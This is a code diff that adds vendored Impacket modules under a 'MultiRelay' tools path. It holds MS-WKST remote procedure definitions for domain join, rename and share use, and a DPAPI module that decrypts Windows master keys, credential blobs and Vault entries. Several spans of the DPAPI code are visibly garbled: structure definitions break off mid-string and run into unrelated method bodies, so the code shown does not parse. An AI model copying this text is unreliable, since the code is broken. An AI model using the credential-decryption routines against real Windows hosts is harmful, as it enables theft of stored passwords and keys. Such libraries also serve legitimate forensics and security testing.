+# 3.2.4.15 NetrRenameMachineInDomain2 (Opnum 24)
+class NetrRenameMachineInDomain2(NDRCALL):
+ opnum = 24
+ structure = (
+ ('ServerName', LPWSTR),
+ ('MachineName', LPWSTR),
+ ('AccountName', LPWSTR),
+ ('Password', PJOINPR_ENCRYPTED_USER_PASSWORD),
+ ('Options', ULONG),
+ )
+
+class NetrRenameMachineInDomain2Response(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.16 NetrValidateName2 (Opnum 25)
+class NetrValidateName2(NDRCALL):
+ opnum = 25
+ structure = (
+ ('ServerName', LPWSTR),
+ ('NameToValidate', WSTR),
+ ('AccountName', LPWSTR),
+ ('Password', PJOINPR_ENCRYPTED_USER_PASSWORD),
+ ('NameType', NETSETUP_NAME_TYPE),
+ )
+
+class NetrValidateName2Response(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.17 NetrGetJoinableOUs2 (Opnum 26)
+class NetrGetJoinableOUs2(NDRCALL):
+ opnum = 26
+ structure = (
+ ('ServerName', LPWSTR),
+ ('DomainNameParam', WSTR),
+ ('AccountName', LPWSTR),
+ ('Password', PJOINPR_ENCRYPTED_USER_PASSWORD),
+ ('OUCount', ULONG),
+ )
+
+class NetrGetJoinableOUs2Response(NDRCALL):
+ structure = (
+ ('OUCount', LPLONG),
+ ('OUs',PUNICODE_STRING_ARRAY),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.18 NetrAddAlternateComputerName (Opnum 27)
+class NetrAddAlternateComputerName(NDRCALL):
+ opnum = 27
+ structure = (
+ ('ServerName', LPWSTR),
+ ('AlternateName', LPWSTR),
+ ('DomainAccount', LPWSTR),
+ ('EncryptedPassword', PJOINPR_ENCRYPTED_USER_PASSWORD),
+ ('Reserved', ULONG),
+ )
+
+class NetrAddAlternateComputerNameResponse(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.19 NetrRemoveAlternateComputerName (Opnum 28)
+class NetrRemoveAlternateComputerName(NDRCALL):
+ opnum = 28
+ structure = (
+ ('ServerName', LPWSTR),
+ ('AlternateName', LPWSTR),
+ ('DomainAccount', LPWSTR),
+ ('EncryptedPassword', PJOINPR_ENCRYPTED_USER_PASSWORD),
+ ('Reserved', ULONG),
+ )
+
+class NetrRemoveAlternateComputerNameResponse(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.20 NetrSetPrimaryComputerName (Opnum 29)
+class NetrSetPrimaryComputerName(NDRCALL):
+ opnum = 29
+ structure = (
+ ('ServerName', LPWSTR),
+ ('PrimaryName', LPWSTR),
+ ('DomainAccount', LPWSTR),
+ ('EncryptedPassword', PJOINPR_ENCRYPTED_USER_PASSWORD),
+ ('Reserved', ULONG),
+ )
+
+class NetrSetPrimaryComputerNameResponse(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.4.21 NetrEnumerateComputerNames (Opnum 30)
+class NetrEnumerateComputerNames(NDRCALL):
+ opnum = 30
+ structure = (
+ ('ServerName', LPWKSSVC_IMPERSONATE_HANDLE),
+ ('NameType', NET_COMPUTER_NAME_TYPE),
+ ('Reserved', ULONG),
+ )
+
+class NetrEnumerateComputerNamesResponse(NDRCALL):
+ structure = (
+ ('ComputerNames',PNET_COMPUTER_NAME_ARRAY),
+ ('ErrorCode',ULONG),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (NetrWkstaGetInfo, NetrWkstaGetInfoResponse),
+ 1 : (NetrWkstaSetInfo, NetrWkstaSetInfoResponse),
+ 2 : (NetrWkstaUserEnum, NetrWkstaUserEnumResponse),
+ 5 : (NetrWkstaTransportEnum, NetrWkstaTransportEnumResponse),
+ 6 : (NetrWkstaTransportAdd, NetrWkstaTransportAddResponse),
+# 7 : (NetrWkstaTransportDel, NetrWkstaTransportDelResponse),
+ 8 : (NetrUseAdd, NetrUseAddResponse),
+ 9 : (NetrUseGetInfo, NetrUseGetInfoResponse),
+10 : (NetrUseDel, NetrUseDelResponse),
+11 : (NetrUseEnum, NetrUseEnumResponse),
+13 : (NetrWorkstationStatisticsGet, NetrWorkstationStatisticsGetResponse),
+20 : (NetrGetJoinInformation, NetrGetJoinInformationResponse),
+22 : (NetrJoinDomain2, NetrJoinDomain2Response),
+23 : (NetrUnjoinDomain2, NetrUnjoinDomain2Response),
+24 : (NetrRenameMachineInDomain2, NetrRenameMachineInDomain2Response),
+25 : (NetrValidateName2, NetrValidateName2Response),
+26 : (NetrGetJoinableOUs2, NetrGetJoinableOUs2Response),
+27 : (NetrAddAlternateComputerName, NetrAddAlternateComputerNameResponse),
+28 : (NetrRemoveAlternateComputerName, NetrRemoveAlternateComputerNameResponse),
+29 : (NetrSetPrimaryComputerName, NetrSetPrimaryComputerNameResponse),
+30 : (NetrEnumerateComputerNames, NetrEnumerateComputerNamesResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+ if string == NULL:
+ return string
+
+ if string[-1:] != '\x00':
+ return string + '\x00'
+ else:
+ return string
+
+def hNetrWkstaGetInfo(dce, level):
+ request = NetrWkstaGetInfo()
+ request['ServerName'] = '\x00'*10
+ request['Level'] = level
+ return dce.request(request)
+
+def hNetrWkstaUserEnum(dce, level, preferredMaximumLength=0xffffffff):
+ request = NetrWkstaUserEnum()
+ request['ServerName'] = '\x00'*10
+ request['UserInfo']['Level'] = level
+ request['UserInfo']['WkstaUserInfo']['tag'] = level
+ request['PreferredMaximumLength'] = preferredMaximumLength
+ return dce.request(request)
+
+def hNetrWkstaTransportEnum(dce, level, resumeHandle = 0, preferredMaximumLength = 0xffffffff):
+ request = NetrWkstaTransportEnum()
+ request['ServerName'] = '\x00'*10
+ request['TransportInfo']['Level'] = level
+ request['TransportInfo']['WkstaTransportInfo']['tag'] = level
+ request['ResumeHandle'] = resumeHandle
+ request['PreferredMaximumLength'] = preferredMaximumLength
+ return dce.request(request)
+
+def hNetrWkstaSetInfo(dce, level, wkstInfo):
+ request = NetrWkstaSetInfo()
+ request['ServerName'] = '\x00'*10
+ request['Level'] = level
+ request['WkstaInfo']['tag'] = level
+ request['WkstaInfo']['WkstaInfo%d'% level] = wkstInfo
+ return dce.request(request)
+
+def hNetrWorkstationStatisticsGet(dce, serviceName, level, options):
+ request = NetrWorkstationStatisticsGet()
+ request['ServerName'] = '\x00'*10
+ request['ServiceName'] = serviceName
+ request['Level'] = level
+ request['Options'] = options
+ return dce.request(request)
+
+def hNetrGetJoinInformation(dce, nameBuffer):
+ request = NetrGetJoinInformation()
+ request['ServerName'] = '\x00'*10
+ request['NameBuffer'] = nameBuffer
+ return dce.request(request)
+
+def hNetrJoinDomain2(dce, domainNameParam, machineAccountOU, accountName, password, options):
+ request = NetrJoinDomain2()
+ request['ServerName'] = '\x00'*10
+ request['DomainNameParam'] = checkNullString(domainNameParam)
+ request['MachineAccountOU'] = checkNullString(machineAccountOU)
+ request['AccountName'] = checkNullString(accountName)
+ if password == NULL:
+ request['Password'] = NULL
+ else:
+ request['Password']['Buffer'] = password
+ request['Options'] = options
+ return dce.request(request)
+
+def hNetrUnjoinDomain2(dce, accountName, password, options):
+ request = NetrUnjoinDomain2()
+ request['ServerName'] = '\x00'*10
+ request['AccountName'] = checkNullString(accountName)
+ if password == NULL:
+ request['Password'] = NULL
+ else:
+ request['Password']['Buffer'] = password
+ request['Options'] = options
+ return dce.request(request)
+
+def hNetrRenameMachineInDomain2(dce, machineName, accountName, password, options):
+ request = NetrRenameMachineInDomain2()
+ request['ServerName'] = '\x00'*10
+ request['MachineName'] = checkNullString(machineName)
+ request['AccountName'] = checkNullString(accountName)
+ if password == NULL:
+ request['Password'] = NULL
+ else:
+ request['Password']['Buffer'] = password
+ request['Options'] = options
+ return dce.request(request)
+
+def hNetrValidateName2(dce, nameToValidate, accountName, password, nameType):
+ request = NetrValidateName2()
+ request['ServerName'] = '\x00'*10
+ request['NameToValidate'] = checkNullString(nameToValidate)
+ request['AccountName'] = checkNullString(accountName)
+ if password == NULL:
+ request['Password'] = NULL
+ else:
+ request['Password']['Buffer'] = password
+ request['NameType'] = nameType
+ return dce.request(request)
+
+def hNetrGetJoinableOUs2(dce, domainNameParam, accountName, password, OUCount):
+ request = NetrGetJoinableOUs2()
+ request['ServerName'] = '\x00'*10
+ request['DomainNameParam'] = checkNullString(domainNameParam)
+ request['AccountName'] = checkNullString(accountName)
+ if password == NULL:
+ request['Password'] = NULL
+ else:
+ request['Password']['Buffer'] = password
+ request['OUCount'] = OUCount
+ return dce.request(request)
+
+def hNetrAddAlternateComputerName(dce, alternateName, domainAccount, encryptedPassword):
+ request = NetrAddAlternateComputerName()
+ request['ServerName'] = '\x00'*10
+ request['AlternateName'] = checkNullString(alternateName)
+ request['DomainAccount'] = checkNullString(domainAccount)
+ if encryptedPassword == NULL:
+ request['EncryptedPassword'] = NULL
+ else:
+ request['EncryptedPassword']['Buffer'] = encryptedPassword
+ return dce.request(request)
+
+def hNetrRemoveAlternateComputerName(dce, alternateName, domainAccount, encryptedPassword):
+ request = NetrRemoveAlternateComputerName()
+ request['ServerName'] = '\x00'*10
+ request['AlternateName'] = checkNullString(alternateName)
+ request['DomainAccount'] = checkNullString(domainAccount)
+ if encryptedPassword == NULL:
+ request['EncryptedPassword'] = NULL
+ else:
+ request['EncryptedPassword']['Buffer'] = encryptedPassword
+ return dce.request(request)
+
+def hNetrSetPrimaryComputerName(dce, primaryName, domainAccount, encryptedPassword):
+ request = NetrSetPrimaryComputerName()
+ request['ServerName'] = '\x00'*10
+ request['PrimaryName'] = checkNullString(primaryName)
+ request['DomainAccount'] = checkNullString(domainAccount)
+ if encryptedPassword == NULL:
+ request['EncryptedPassword'] = NULL
+ else:
+ request['EncryptedPassword']['Buffer'] = encryptedPassword
+ return dce.request(request)
+
+def hNetrEnumerateComputerNames(dce, nameType):
+ request = NetrEnumerateComputerNames()
+ request['ServerName'] = '\x00'*10
+ request['NameType'] = nameType
+ return dce.request(request)
+
+def hNetrUseAdd(dce, level, infoStruct):
+ request = NetrUseAdd()
+ request['ServerName'] = '\x00'*10
+ request['Level'] = level
+ request['InfoStruct']['tag'] = level
+ request['InfoStruct']['UseInfo%d' % level] = infoStruct
+ return dce.request(request)
+
+def hNetrUseEnum(dce, level, resumeHandle = 0, preferredMaximumLength = 0xffffffff):
+ request = NetrUseEnum()
+ request['ServerName'] = '\x00'*10
+ request['InfoStruct']['Level'] = level
+ request['InfoStruct']['UseInfo']['tag'] = level
+ request['InfoStruct']['UseInfo']['Level%d'%level]['Buffer'] = NULL
+ request['PreferredMaximumLength'] = preferredMaximumLength
+ request['ResumeHandle'] = resumeHandle
+ return dce.request(request)
+
+def hNetrUseGetInfo(dce, useName, level):
+ request = NetrUseGetInfo()
+ request['ServerName'] = '\x00'*10
+ request['UseName'] = checkNullString(useName)
+ request['Level'] = level
+ return dce.request(request)
+
+def hNetrUseDel(dce, useName, forceLevel=USE_LOTS_OF_FORCE):
+ request = NetrUseDel()
+ request['ServerName'] = '\x00'*10
+ request['UseName'] = checkNullString(useName)
+ request['ForceLevel'] = forceLevel
+ return dce.request(request)
diff --git a/tools/MultiRelay/impacket-dev/impacket/dpapi.py b/tools/MultiRelay/impacket-dev/impacket/dpapi.py
new file mode 100644
index 0000000..bdc6d88
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dpapi.py
@@ -0,0 +1,1038 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author:
+# Alberto Solino (@agsolino)
+#
+# Description:
+# DPAPI and Windows Vault parsing structures and manipulation
+#
+# References: All of the work done by these guys. I just adapted their work to my needs.
+# https://www.passcape.com/index.php?section=docsys&cmd=details&id=28
+# https://github.com/jordanbtucker/dpapick
+# https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials (and everything else Ben did )
+# http://blog.digital-forensics.it/2016/01/windows-revaulting.html
+# https://www.passcape.com/windows_password_recovery_vault_explorer
+# https://www.passcape.com/windows_password_recovery_dpapi_master_key
+#
+from __future__ import division
+from __future__ import print_function
+import sys
+
+from struct import unpack
+from datetime import datetime
+from binascii import unhexlify, hexlify
+from struct import pack
+from Cryptodome.Hash import HMAC, SHA512, SHA1
+from Cryptodome.Cipher import AES, DES3
+from Cryptodome.Util.Padding import unpad
+from Cryptodome.PublicKey import RSA
+from Cryptodome.Util.number import bytes_to_long
+from six import PY3
+
+from impacket.ese import getUnixTime
+from impacket.structure import Structure, hexdump
+from impacket.uuid import bin_to_string
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.dtypes import RPC_SID
+
+# Algorithm classes
+ALG_CLASS_ANY = (0)
+ALG_CLASS_SIGNATURE = (1 << 13)
+ALG_CLASS_MSG_ENCRYPT = (2 << 13)
+ALG_CLASS_DATA_ENCRYPT = (3 << 13)
+ALG_CLASS_HASH = (4 << 13)
+ALG_CLASS_KEY_EXCHANGE = (5 << 13)
+ALG_CLASS_ALL = (7 << 13)
+
+# Algorithm types
+ALG_TYPE_ANY = (0)
+ALG_TYPE_DSS = (1 << 9)
+ALG_TYPE_RSA = (2 << 9)
+ALG_TYPE_BLOCK = (3 << 9)
+ALG_TYPE_STREAM = (4 << 9)
+ALG_TYPE_DH = (5 << 9)
+ALG_TYPE_SECURECHANNEL = (6 << 9)
+ALG_SID_ANY = (0)
+ALG_SID_RSA_ANY = 0
+ALG_SID_RSA_PKCS = 1
+ALG_SID_RSA_MSATWORK = 2
+ALG_SID_RSA_ENTRUST = 3
+ALG_SID_RSA_PGP = 4
+ALG_SID_DSS_ANY = 0
+ALG_SID_DSS_PKCS = 1
+ALG_SID_DSS_DMS = 2
+ALG_SID_ECDSA = 3
+
+# Block cipher sub ids
+ALG_SID_DES = 1
+ALG_SID_3DES = 3
+ALG_SID_DESX = 4
+ALG_SID_IDEA = 5
+ALG_SID_CAST = 6
+ALG_SID_SAFERSK64 = 7
+ALG_SID_SAFERSK128 = 8
+ALG_SID_3DES_112 = 9
+ALG_SID_CYLINK_MEK = 12
+ALG_SID_RC5 = 13
+ALG_SID_AES_128 = 14
+ALG_SID_AES_192 = 15
+ALG_SID_AES_256 = 16
+ALG_SID_AES = 17
+ALG_SID_SKIPJACK = 10
+ALG_SID_TEK = 11
+
+CRYPT_MODE_CBCI = 6 # ANSI CBC Interleaved
+CRYPT_MODE_CFBP = 7 # ANSI CFB Pipelined
+CRYPT_MODE_OFBP = 8 # ANSI OFB Pipelined
+CRYPT_MODE_CBCOFM = 9 # ANSI CBC + OF Masking
+CRYPT_MODE_CBCOFMI = 10 # ANSI CBC + OFM Interleaved
+
+ALG_SID_RC2 = 2
+ALG_SID_RC4 = 1
+ALG_SID_SEAL = 2
+
+# Diffie - Hellman sub - ids
+ALG_SID_DH_SANDF = 1
+ALG_SID_DH_EPHEM = 2
+ALG_SID_AGREED_KEY_ANY = 3
+ALG_SID_KEA = 4
+ALG_SID_ECDH = 5
+
+# Hash sub ids
+ALG_SID_MD2 = 1
+ALG_SID_MD4 = 2
+ALG_SID_MD5 = 3
+ALG_SID_SHA = 4
+ALG_SID_SHA1 = 4
+ALG_SID_MAC = 5
+ALG_SID_RIPEMD = 6
+ALG_SID_RIPEMD160 = 7
+ALG_SID_SSL3SHAMD5 = 8
+ALG_SID_HMAC = 9
+ALG_SID_TLS1PRF = 10
+ALG_SID_HASH_REPLACE_OWF = 11
+ALG_SID_SHA_256 = 12
+ALG_SID_SHA_384 = 13
+ALG_SID_SHA_512 = 14
+
+# secure channel sub ids
+ALG_SID_SSL3_MASTER = 1
+ALG_SID_SCHANNEL_MASTER_HASH = 2
+ALG_SID_SCHANNEL_MAC_KEY = 3
+ALG_SID_PCT1_MASTER = 4
+ALG_SID_SSL2_MASTER = 5
+ALG_SID_TLS1_MASTER = 6
+ALG_SID_SCHANNEL_ENC_KEY = 7
+ALG_SID_ECMQV = 1
+
+def getFlags(myenum, flags):
+ return '|'.join([name for name, member in myenum.__members__.items() if member.value & flags])
+
+class FLAGS(Enum):
+ CRYPTPROTECT_UI_FORBIDDEN = 0x1
+ CRYPTPROTECT_LOCAL_MACHINE = 0x4
+ CRYPTPROTECT_CRED_SYNC = 0x8
+ CRYPTPROTECT_AUDIT = 0x10
+ CRYPTPROTECT_VERIFY_PROTECTION = 0x40
+ CRYPTPROTECT_CRED_REGENERATE = 0x80
+ CRYPTPROTECT_SYSTEM = 0x20000000
+
+# algorithm identifier definitions
+class ALGORITHMS(Enum):
+ CALG_MD2 = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_MD2)
+ CALG_MD4 = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_MD4)
+ CALG_MD5 = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_MD5)
+ CALG_SHA = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA)
+ CALG_SHA1 = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA1)
+ CALG_RSA_SIGN = (ALG_CLASS_SIGNATURE | ALG_TYPE_RSA | ALG_SID_RSA_ANY)
+ CALG_DSS_SIGN = (ALG_CLASS_SIGNATURE | ALG_TYPE_DSS | ALG_SID_DSS_ANY)
+ CALG_NO_SIGN = (ALG_CLASS_SIGNATURE | ALG_TYPE_ANY | ALG_SID_ANY)
+ CALG_RSA_KEYX = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_RSA|ALG_SID_RSA_ANY)
+ CALG_DES = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_DES)
+ CALG_3DES_112 = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_3DES_112)
+ CALG_3DES = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_3DES)
+ CALG_DESX = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_DESX)
+ CALG_RC2 = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_RC2)
+ CALG_RC4 = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_STREAM|ALG_SID_RC4)
+ CALG_SEAL = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_STREAM|ALG_SID_SEAL)
+ CALG_DH_SF = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_DH|ALG_SID_DH_SANDF)
+ CALG_DH_EPHEM = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_DH|ALG_SID_DH_EPHEM)
+ CALG_AGREEDKEY_ANY = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_DH|ALG_SID_AGREED_KEY_ANY)
+ CALG_KEA_KEYX = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_DH|ALG_SID_KEA)
+ CALG_HUGHES_MD5 = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_ANY|ALG_SID_MD5)
+ CALG_SKIPJACK = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_SKIPJACK)
+ CALG_TEK = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_TEK)
+ CALG_SSL3_SHAMD5 = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SSL3SHAMD5)
+ CALG_SSL3_MASTER = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SSL3_MASTER)
+ CALG_SCHANNEL_MASTER_HASH = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SCHANNEL_MASTER_HASH)
+ CALG_SCHANNEL_MAC_KEY = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SCHANNEL_MAC_KEY)
+ CALG_SCHANNEL_ENC_KEY = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SCHANNEL_ENC_KEY)
+ CALG_PCT1_MASTER = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_PCT1_MASTER)
+ CALG_SSL2_MASTER = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SSL2_MASTER)
+ CALG_TLS1_MASTER = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_TLS1_MASTER)
+ CALG_RC5 = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_RC5)
+ CALG_HMAC = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HMAC)
+ CALG_TLS1PRF = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_TLS1PRF)
+ CALG_HASH_REPLACE_OWF = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HASH_REPLACE_OWF)
+ CALG_AES_128 = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_AES_128)
+ CALG_AES_192 = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_AES_192)
+ CALG_AES_256 = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_AES_256)
+ CALG_AES = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_AES)
+ CALG_SHA_256 = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA_256)
+ CALG_SHA_384 = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA_384)
+ CALG_SHA_512 = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA_512)
+ CALG_ECDH = (ALG_CLASS_KEY_EXCHANGE | ALG_TYPE_DH | ALG_SID_ECDH)
+ CALG_ECMQV = (ALG_CLASS_KEY_EXCHANGE | ALG_TYPE_ANY | ALG_SID_ECMQV)
+ CALG_ECDSA = (ALG_CLASS_SIGNATURE | ALG_TYPE_DSS | ALG_SID_ECDSA)
+
+class CREDENTIAL_FLAGS(Enum):
+ CRED_FLAGS_PASSWORD_FOR_CERT = 0x1
+ CRED_FLAGS_PROMPT_NOW = 0x2
+ CRED_FLAGS_USERNAME_TARGET = 0x4
+ CRED_FLAGS_OWF_CRED_BLOB = 0x8
+ CRED_FLAGS_REQUIRE_CONFIRMATION = 0x10
+ CRED_FLAGS_WILDCARD_MATCH = 0x20
+ CRED_FLAGS_VSM_PROTECTED = 0x40
+ CRED_FLAGS_NGC_CERT = 0x80
+
+class CREDENTIAL_TYPE(Enum):
+ CRED_TYPE_GENERIC = 0x1
+ CRED_TYPE_DOMAIN_PASSWORD = 0x2
+ CRED_TYPE_DOMAIN_CERTIFICATE = 0x3
+ CRED_TYPE_DOMAIN_VISIBLE_PASSWORD = 0x4
+ CRED_TYPE_GENERIC_CERTIFICATE = 0x5
+ CRED_TYPE_DOMAIN_EXTENDED = 0x6
+ CRED_TYPE_MAXIMUM = 0x7
+ CRED_TYPE_MAXIMUM_EX = 0x8
+
+class CREDENTIAL_PERSIST(Enum):
+ CRED_PERSIST_NONE = 0x0
+ CRED_PERSIST_SESSION = 0x1
+ CRED_PERSIST_LOCAL_MACHINE = 0x2
+ CRED_PERSIST_ENTERPRISE = 0x3
+
+ALGORITHMS_DATA = {
+ # Algorithm: key/SaltLen, CryptHashModule, Mode, IVLen, BlockSize
+ ALGORITHMS.CALG_SHA.value: (160//8, SHA1, None, None, 512//8),
+ ALGORITHMS.CALG_HMAC.value: (160//8, SHA512, None, None, 512//8),
+ ALGORITHMS.CALG_3DES.value: (192//8, DES3, DES3.MODE_CBC, 64//8),
+ ALGORITHMS.CALG_SHA_512.value: (128//8, SHA512, None, None, 1024//8),
+ ALGORITHMS.CALG_AES_256.value: (256//8, AES, AES.MODE_CBC, 128//8),
+}
+
+class MasterKeyFile(Structure):
+ structure = (
+ ('Version', ' ALGORITHMS_DATA[self['HashAlgo']][4]:
+ derivedKey = HMAC.new(sessionKey, digestmod = ALGORITHMS_DATA[self['HashAlgo']][1]).digest()
+ else:
+ derivedKey = sessionKey
+
+
+ if len(derivedKey) < ALGORITHMS_DATA[self['CryptAlgo']][0]:
+ # Extend the key
+ derivedKey += b'\x00'*ALGORITHMS_DATA[self['HashAlgo']][4]
+ ipad = bytearray([ i ^ 0x36 for i in bytearray(derivedKey)][:ALGORITHMS_DATA[self['HashAlgo']][4]])
+ opad = bytearray([ i ^ 0x5c for i in bytearray(derivedKey)][:ALGORITHMS_DATA[self['HashAlgo']][4]])
+ derivedKey = ALGORITHMS_DATA[self['HashAlgo']][1].new(ipad).digest() + \
+ ALGORITHMS_DATA[self['HashAlgo']][1].new(opad).digest()
+ derivedKey = fixparity(derivedKey)
+
+ return derivedKey
+
+ def decrypt(self, key, entropy = None):
+ keyHash = SHA1.new(key).digest()
+ sessionKey = HMAC.new(keyHash, self['Salt'], ALGORITHMS_DATA[self['HashAlgo']][1])
+ if entropy is not None:
+ sessionKey.update(entropy)
+
+ sessionKey = sessionKey.digest()
+
+ # Derive the key
+ derivedKey = self.deriveKey(sessionKey)
+
+ cipher = ALGORITHMS_DATA[self['CryptAlgo']][1].new(derivedKey[:ALGORITHMS_DATA[self['CryptAlgo']][0]],
+ mode=ALGORITHMS_DATA[self['CryptAlgo']][2], iv=b'\x00'*ALGORITHMS_DATA[self['CryptAlgo']][3])
+ cleartext = unpad(cipher.decrypt(self['Data']), ALGORITHMS_DATA[self['CryptAlgo']][1].block_size)
+
+ # Now check the signature
+
+ # ToDo Fix this, it's just ugly, more testing so we can remove one
+ toSign = (self.rawData[20:][:len(self.rawData)-20-len(self['Sign'])-4])
+
+ # Calculate the different HMACKeys
+ keyHash2 = keyHash + b"\x00"*ALGORITHMS_DATA[self['HashAlgo']][1].block_size
+ ipad = bytearray([i ^ 0x36 for i in bytearray(keyHash2)][:ALGORITHMS_DATA[self['HashAlgo']][1].block_size])
+ opad = bytearray([i ^ 0x5c for i in bytearray(keyHash2)][:ALGORITHMS_DATA[self['HashAlgo']][1].block_size])
+ a = ALGORITHMS_DATA[self['HashAlgo']][1].new(ipad)
+ a.update(self['HMac'])
+
+ hmacCalculated1 = ALGORITHMS_DATA[self['HashAlgo']][1].new(opad)
+ hmacCalculated1.update(a.digest())
+
+ if entropy is not None:
+ hmacCalculated1.update(entropy)
+
+ hmacCalculated1.update(toSign)
+
+ hmacCalculated3 = HMAC.new(keyHash, self['HMac'], ALGORITHMS_DATA[self['HashAlgo']][1])
+ if entropy is not None:
+ hmacCalculated3.update(entropy)
+
+ hmacCalculated3.update(toSign)
+
+ if hmacCalculated1.digest() == self['Sign'] or hmacCalculated3.digest() == self['Sign']:
+ return cleartext
+ else:
+ return None
+
+class VAULT_ATTRIBUTE(Structure):
+ structure = (
+ ('Id', ' 20:
+ if data[16:][:6] == b'\x00'*6:
+ self.structure += self.padding
+ if unpack('= 100:
+ self.structure += self.id100
+ if len(data[16:]) >= 9:
+ self.structure += self.extended
+ Structure.__init__(self, data, alignment)
+
+
+ def dump(self):
+ print("[ATTRIBUTE %d]" % self['Id'])
+ if len(self.rawData) > 28:
+ print("Size : 0x%x" % self['Size'])
+ if self['IVPresent'] > 0:
+ print("IVSize : 0x%x" % self['IVSize'])
+ print("IV : %s" % hexlify(self['IV']))
+ print("Data : %s" % hexlify(self['Data']))
+
+class VAULT_ATTRIBUTE_MAP_ENTRY(Structure):
+ structure = (
+ ('Id', ' 0:
+ self.attributesLen.append(self.mapEntries[i]['Offset']-self.mapEntries[i-1]['Offset'])
+
+ self.attributesLen.append(len(self.rawData) - self.mapEntries[i]['Offset'] )
+
+ self.attributes = list()
+ for i, entry in enumerate(self.mapEntries):
+ attribute = VAULT_ATTRIBUTE(self.rawData[entry['Offset']:][:self.attributesLen[i]])
+ self.attributes.append(attribute)
+
+ # Do we have remaining data?
+ self['Data'] = self.rawData[self.mapEntries[-1]['Offset']+len(self.attributes[-1].getData()):]
+
+ def dump(self):
+ print("[VCRD]")
+ print("SchemaGuid : %s" % bin_to_string(self['SchemaGuid']))
+ print("LastWritten : %s" % (datetime.utcfromtimestamp(getUnixTime(self['LastWritten']))))
+ print("FriendlyName: %s" % (self['FriendlyName'].decode('utf-16le')))
+ print()
+ for i,entry in enumerate(self.mapEntries):
+ entry.dump()
+ self.attributes[i].dump()
+ print()
+ print("Remaining : %s" % (hexlify(self['Data'])))
+ print()
+
+class VAULT_VPOL(Structure):
+ structure = (
+ ('Version', '=16:
+ if data[0:1] == b'\x24' or data[0:1] == b'\x34':
+ self.structure = self.structureKDBM
+ else:
+ self.structure = self.structureKSSM
+ Structure.__init__(self, data, alignment)
+
+class VAULT_VPOL_KEYS(Structure):
+ structure = (
+ ('Key1',':', BCRYPT_KEY_WRAP),
+ ('Key2',':', BCRYPT_KEY_WRAP),
+ )
+ def dump(self):
+ print("[VAULT_VPOL_KEYS]")
+ if self['Key1']['Size'] > 0x24:
+ print('Key1:')
+ hexdump(self['Key1']['bKeyBlob'])
+ print('Key2:')
+ hexdump(self['Key2']['bKeyBlob'])
+ else:
+ print('Key1: 0x%s' % hexlify(self['Key1']['bKeyBlob']['bKey']).decode('latin-1'))
+ print('Key2: 0x%s' % hexlify(self['Key2']['bKeyBlob']['bKey']).decode('latin-1'))
+ print()
+
+class VAULT_INTERNET_EXPLORER(Structure):
+ structure = (
+ ('Version',' 8192:
+ self.structure += self.extended_win7
+
